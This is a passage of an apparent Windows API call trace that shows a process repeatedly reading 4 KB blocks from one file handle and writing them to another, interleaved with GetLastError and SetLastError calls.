returned 1 [0097.836] GetLastError () returned 0x0 [0097.836] SetLastError (dwErrCode=0x0) [0097.836] GetLastError () returned 0x0 [0097.836] SetLastError (dwErrCode=0x0) [0097.836] GetLastError () returned 0x0 [0097.836] SetLastError (dwErrCode=0x0) [0097.836] GetLastError () returned 0x0 [0097.836] SetLastError (dwErrCode=0x0) [0097.836] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.836] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.837] GetLastError () returned 0x0 [0097.837] SetLastError (dwErrCode=0x0) [0097.837] GetLastError () returned 0x0 [0097.837] SetLastError (dwErrCode=0x0) [0097.837] GetLastError () returned 0x0 [0097.837] SetLastError (dwErrCode=0x0) [0097.837] GetLastError () returned 0x0 [0097.837] SetLastError (dwErrCode=0x0) [0097.837] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.837] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.838] GetLastError () returned 0x0 [0097.838] SetLastError (dwErrCode=0x0) [0097.838] GetLastError () returned 0x0 [0097.838] SetLastError (dwErrCode=0x0) [0097.838] GetLastError () returned 0x0 [0097.838] SetLastError (dwErrCode=0x0) [0097.838] GetLastError () returned 0x0 [0097.838] SetLastError (dwErrCode=0x0) [0097.838] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.838] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.839] GetLastError () returned 0x0 [0097.839] SetLastError (dwErrCode=0x0) [0097.839] GetLastError () returned 0x0 [0097.839] SetLastError (dwErrCode=0x0) [0097.839] GetLastError () returned 0x0 [0097.839] SetLastError (dwErrCode=0x0) [0097.839] GetLastError () returned 0x0 [0097.839] SetLastError (dwErrCode=0x0) [0097.839] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.839] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.839] GetLastError () returned 0x0 [0097.840] SetLastError (dwErrCode=0x0) [0097.840] GetLastError () returned 0x0 [0097.840] SetLastError (dwErrCode=0x0) [0097.840] GetLastError () returned 0x0 [0097.840] SetLastError (dwErrCode=0x0) [0097.840] GetLastError () returned 0x0 [0097.840] SetLastError (dwErrCode=0x0) [0097.840] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.840] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.840] GetLastError () returned 0x0 [0097.840] SetLastError (dwErrCode=0x0) [0097.841] GetLastError () returned 0x0 [0097.841] SetLastError (dwErrCode=0x0) [0097.841] GetLastError () returned 0x0 [0097.841] SetLastError (dwErrCode=0x0) [0097.841] GetLastError () returned 0x0 [0097.841] SetLastError (dwErrCode=0x0) [0097.841] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.841] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.841] GetLastError () returned 0x0 [0097.841] SetLastError (dwErrCode=0x0) [0097.841] GetLastError () returned 0x0 [0097.841] SetLastError (dwErrCode=0x0) [0097.842] GetLastError () returned 0x0 [0097.842] SetLastError (dwErrCode=0x0) [0097.842] GetLastError () returned 0x0 [0097.842] SetLastError (dwErrCode=0x0) [0097.842] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.842] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.842] GetLastError () returned 0x0 [0097.842] SetLastError (dwErrCode=0x0) [0097.842] GetLastError () returned 0x0 [0097.843] SetLastError (dwErrCode=0x0) [0097.843] GetLastError () returned 0x0 [0097.843] SetLastError (dwErrCode=0x0) [0097.843] GetLastError () returned 0x0 [0097.843] SetLastError (dwErrCode=0x0) [0097.843] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.843] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.843] GetLastError () returned 0x0 [0097.843] SetLastError (dwErrCode=0x0) [0097.843] GetLastError () returned 0x0 [0097.843] SetLastError (dwErrCode=0x0) [0097.844] GetLastError () returned 0x0 [0097.844] SetLastError (dwErrCode=0x0) [0097.844] GetLastError () returned 0x0 [0097.844] SetLastError (dwErrCode=0x0) [0097.844] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.844] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.844] GetLastError () returned 0x0 [0097.844] SetLastError (dwErrCode=0x0) [0097.844] GetLastError () returned 0x0 [0097.844] SetLastError (dwErrCode=0x0) [0097.845] GetLastError () returned 0x0 [0097.845] SetLastError (dwErrCode=0x0) [0097.845] GetLastError () returned 0x0 [0097.845] SetLastError (dwErrCode=0x0) [0097.845] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.845] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.845] GetLastError () returned 0x0 [0097.845] SetLastError (dwErrCode=0x0) [0097.845] GetLastError () returned 0x0 [0097.845] SetLastError (dwErrCode=0x0) [0097.845] GetLastError () returned 0x0 [0097.846] SetLastError (dwErrCode=0x0) [0097.846] GetLastError () returned 0x0 [0097.846] SetLastError (dwErrCode=0x0) [0097.846] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.846] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.846] GetLastError () returned 0x0 [0097.846] SetLastError (dwErrCode=0x0) [0097.846] GetLastError () returned 0x0 [0097.846] SetLastError (dwErrCode=0x0) [0097.846] GetLastError () returned 0x0 [0097.846] SetLastError (dwErrCode=0x0) [0097.846] GetLastError () returned 0x0 [0097.847] SetLastError (dwErrCode=0x0) [0097.847] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.967] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.967] GetLastError () returned 0x0 [0097.967] SetLastError (dwErrCode=0x0) [0097.967] GetLastError () returned 0x0 [0097.967] SetLastError (dwErrCode=0x0) [0097.967] GetLastError () returned 0x0 [0097.967] SetLastError (dwErrCode=0x0) [0097.967] GetLastError () returned 0x0 [0097.967] SetLastError (dwErrCode=0x0) [0097.967] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.968] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.968] GetLastError () returned 0x0 [0097.968] SetLastError (dwErrCode=0x0) [0097.968] GetLastError () returned 0x0 [0097.968] SetLastError (dwErrCode=0x0) [0097.968] GetLastError () returned 0x0 [0097.968] SetLastError (dwErrCode=0x0) [0097.968] GetLastError () returned 0x0 [0097.968] SetLastError (dwErrCode=0x0) [0097.968] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.969] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.969] GetLastError () returned 0x0 [0097.969] SetLastError (dwErrCode=0x0) [0097.969] GetLastError () returned 0x0 [0097.969] SetLastError (dwErrCode=0x0) [0097.969] GetLastError () returned 0x0 [0097.969] SetLastError (dwErrCode=0x0) [0097.969] GetLastError () returned 0x0 [0097.969] SetLastError (dwErrCode=0x0) [0097.970] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.970] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.970] GetLastError () returned 0x0 [0097.970] SetLastError (dwErrCode=0x0) [0097.970] GetLastError () returned 0x0 [0097.970] SetLastError (dwErrCode=0x0) [0097.970] GetLastError () returned 0x0 [0097.970] SetLastError (dwErrCode=0x0) [0097.970] GetLastError () returned 0x0 [0097.970] SetLastError (dwErrCode=0x0) [0097.970] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.971] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.971] GetLastError () returned 0x0 [0097.971] SetLastError (dwErrCode=0x0) [0097.971] GetLastError () returned 0x0 [0097.971] SetLastError (dwErrCode=0x0) [0097.971] GetLastError () returned 0x0 [0097.971] SetLastError (dwErrCode=0x0) [0097.971] GetLastError () returned 0x0 [0097.971] SetLastError (dwErrCode=0x0) [0097.971] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.972] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.972] GetLastError () returned 0x0 [0097.972] SetLastError (dwErrCode=0x0) [0097.972] GetLastError () returned 0x0 [0097.972] SetLastError (dwErrCode=0x0) [0097.972] GetLastError () returned 0x0 [0097.972] SetLastError (dwErrCode=0x0) [0097.972] GetLastError () returned 0x0 [0097.972] SetLastError (dwErrCode=0x0) [0097.972] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.972] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.973] GetLastError () returned 0x0 [0097.973] SetLastError (dwErrCode=0x0) [0097.973] GetLastError () returned 0x0 [0097.973] SetLastError (dwErrCode=0x0) [0097.973] GetLastError () returned 0x0 [0097.973] SetLastError (dwErrCode=0x0) [0097.973] GetLastError () returned 0x0 [0097.973] SetLastError (dwErrCode=0x0) [0097.973] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.973] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.974] GetLastError () returned 0x0 [0097.974] SetLastError (dwErrCode=0x0) [0097.974] GetLastError () returned 0x0 [0097.974] SetLastError (dwErrCode=0x0) [0097.974] GetLastError () returned 0x0 [0097.974] SetLastError (dwErrCode=0x0) [0097.974] GetLastError () returned 0x0 [0097.974] SetLastError (dwErrCode=0x0) [0097.974] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.974] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.974] GetLastError () returned 0x0 [0097.974] SetLastError (dwErrCode=0x0) [0097.975] GetLastError () returned 0x0 [0097.975] SetLastError (dwErrCode=0x0) [0097.975] GetLastError () returned 0x0 [0097.975] SetLastError (dwErrCode=0x0) [0097.975] GetLastError () returned 0x0 [0097.975] SetLastError (dwErrCode=0x0) [0097.975] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.975] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.975] GetLastError () returned 0x0 [0097.975] SetLastError (dwErrCode=0x0) [0097.975] GetLastError () returned 0x0 [0097.975] SetLastError (dwErrCode=0x0) [0097.976] GetLastError () returned 0x0 [0097.976] SetLastError (dwErrCode=0x0) [0097.976] GetLastError () returned 0x0 [0097.976] SetLastError (dwErrCode=0x0) [0097.976] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.976] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.976] GetLastError () returned 0x0 [0097.976] SetLastError (dwErrCode=0x0) [0097.976] GetLastError () returned 0x0 [0097.976] SetLastError (dwErrCode=0x0) [0097.976] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.977] GetLastError () returned 0x0 [0097.977] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.978] GetLastError () returned 0x0 [0097.978] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.979] GetLastError () returned 0x0 [0097.979] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.980] SetLastError (dwErrCode=0x0) [0097.980] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.981] GetLastError () returned 0x0 [0097.981] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.982] SetLastError (dwErrCode=0x0) [0097.982] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.983] GetLastError () returned 0x0 [0097.983] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.984] GetLastError () returned 0x0 [0097.984] SetLastError (dwErrCode=0x0) [0097.985] GetLastError () returned 0x0 [0097.985] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.986] GetLastError () returned 0x0 [0097.986] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.987] GetLastError () returned 0x0 [0097.987] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) 